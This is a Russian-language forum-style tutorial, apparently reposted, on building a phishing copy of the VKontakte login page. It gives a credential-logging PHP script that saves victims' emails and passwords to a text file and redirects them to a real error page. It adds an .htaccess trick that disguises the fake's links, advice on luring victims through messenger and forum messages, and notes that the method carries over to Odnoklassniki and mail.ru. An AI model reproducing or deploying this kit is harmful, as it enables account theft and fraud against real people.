special

  1. HOME
  2. Хакерство и защита
  3. Как сделать Фейк сайт

Фейк на скорую руку

[iNtrO]

Делать было нечаго,дело было вечером....Собственно на первую мою статью (первую на античате), потянул меня тот факт, что в разделе купи/продай/обменя/кинь по крупному есть тема, в которой один хеккер продовал фейки аж по 10 вмз, да и часто просят создать тот или иной фейк...
Я же расскажу одной статьей как можно забацать универсальный фейк почти подо все, что угондо! Покажу на примере фейка вконтакте.

[SeaRchINg]

И так, 1 что нам нужно, так это выбрать жертворесурс и собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на vkontakte.ru через Operu (!). Жмякаем кнопочку вход, попадаем на логин.пхп, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя Файла пишем index (или login.htm- в зависимости от страницы)


Далее вводим туда нереальные данные и попадаем на страницу, на которой написано
Такой почтовый адрес не зарегистрирован, либо пароль неверный.
Сохраняем ее точно так же, только вместо index пишем bad.
Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором контакта... На вторйо страницы я нашел VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка
Усе, все что нам надо для фейка от ресурса, у нас уже есть.

[CoDiNg]

Такс, теперь иследуем форму логина. Открываем наш index.html и ищем форму входа.
<form method="post" name="login" id="login" action="login.php">

 <input type="hidden" name="success_url" id="success_url" value="">
 <input type="hidden" name="fail_url" id="fail_url" value="">

 <input type="hidden" name="try_to_login" id="try_to_login" value="1">
 <table align="center" cellpadding=0 cellspacing=7 border=0 width="40%">

 <tr>
 <td width="100px">
 <span class="grey">Email:</span>
 </td>
 <td>

 <input class="inputText" type="text" name="email" value="" id="email" size="25" />

 <td>
 </tr>
 <tr>
 <td>
 <span class="grey">Пароль:</span>

 </td>
 <td>
 <input class="inputText" type="password" name="pass" value="" id="pass" size="25" />

 </td>
 </tr>
 
 <tr>
 <td>
 &nbsp;
 </td>
 <td>

 <input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /><small>Чужой компьютер</small>

 </td>
 </tr>
 <tr>
 <td>
 &nbsp;
 </td>
 <td>
Отсюда запоминаем 3 вещи:
<form method="post" name="login" id="login" action="login.php">
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Именно в этих 3 вещах заключаеться первая часть уникальности, на любой социалке или эмайле или еще где либо, везде форма входа(поля), будут в таком види (ну только название полей будит отличаться),к примеру у однокласников это
<input id="field_password" value="" style="width: 170px;" type="password" size="20" name="st.password">
Тоесть просто отличаеться название полей, элементами дизайна-но функция у всех одна и таже.
Теперь мы создаем пхп файл, и называем его к примеру login.php,его содержимое:

PHP Код:
<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at"); 

flock($f,2); 

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"$_POST['email'])&& !empty($_POST['password'])){

fputs($f$_POST['email'].";".$_POST['password']." \n");

     header("Location: http://");

} else {

     header("Location: http://");

}

flock($f,3); 

fclose($f); 

?>
Собственно смотрим на скрипт, пару строчег, но это вполне нормальный фейк,его функционал:
Сохранение передаваемых переменных,их проверка,редирект в зависимости от проверки.

И так, теперь возвращаемся к тем 3 строчкам:
<form method="post" name="login" id="login" action="login.php">
тут у нас все в порядки,имя нашего скрипта совподает с именем ихнего, нобывает что и не совпадет, тогда заменяем его или же переиминовываем наш.
<input class="inputText" type="text" name="email" value="" id="email" size="25" />
<input class="inputText" type="password" name="pass" value="" id="pass" size="25" />
Отсюда нам нужно name="email" и name="pass"
Вставляем их в наш скрипт в нужное место
<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at"); 

flock($f,2); 

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"$_POST['email'])&& !empty($_POST['pass'])){

fputs($f$_POST['email'].";".$_POST['pass']." \n");

     header("Location: http://");

} else {

     header("Location: http://");

}

flock($f,3); 

fclose($f); 

?>
Кто не заметил, это $_POST['email'] и $_POST['pass']

Далее смотрим скрип, тут стаит функция IF ELSE, и прегматч, тоесть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят ывпмдвгк), и поле пароль не пустое, то выполняеться первый редирект, если же эмаил не соответствует или поле пасс пустое, то на второй редирект. Из этого следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел херню (вот тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные данные), то кидаем его обратно, тоесть вписываем bad.htm.

PHP Код:
<?php

/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at"); 

flock($f,2); 

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i"$_POST['email'])&& !empty($_POST['pass'])){

fputs($f$_POST['email'].";".$_POST['pass']." \n");

     header("Location: http://vkontakte.ru/blank.php?code=10");

} else {

     header("Location: bad.htm");

}

flock($f,3); 

fclose($f); 

?>
Сохраняем.Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777.

3) небольшой апдейт...

Этот апдейт подойдет очень дл СИ,в корне на фтп создаем фаил .htaccess со следующим содержанием:

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_URI} !index\.htm
RewriteRule (.*) index.htm? [QSA]

ВНИМАНИЕ!!!
!index\.htm-на этот фаил ссылаеться редирект, если же у вас фейк допустим login.html. то соответственно вам нужно переиминовать индекс в логин.

Такс, данный фаил нам дает ссылку более качественно газлива, а именно:
вашфейк.ру/любой текст, тобишь зная ссылку структуру согдаваемого фейка, к примеру контакта, мы можем сделать так:


вашфейк.ру/photos.php?act=show&id=15884695_588954334&uid=359648756&self=6
и впарить это по аське)))согласитесь. менее заметен теперь фейк))

Вот и все

[THe eND]Собственно что уникального, а то что вы можете зайти на на одноклассников, так же сохранить страницу,вписать переменные,заменить урлы( вот сразу даю http://odnoklassniki.ru/dk?st.cmd=error) и все, обсолютно так же зайти на майил.ру, сохранить переменные и заменить и все))) Единственное, что вам может понадобиться-это креативность, добустим сохранять не главную страницу, а страницу входа.Вы так же можете сделать любой форум, если вы допустим хотите получить акк(отправляете в пм
<a href="фейк">ссылка на тему</a>
, а в фейке указываете эту тему для редиректа.

Дата створення/оновлення: 25.05.2018

stop war in Ukraine

ukrTrident

stand with Ukraine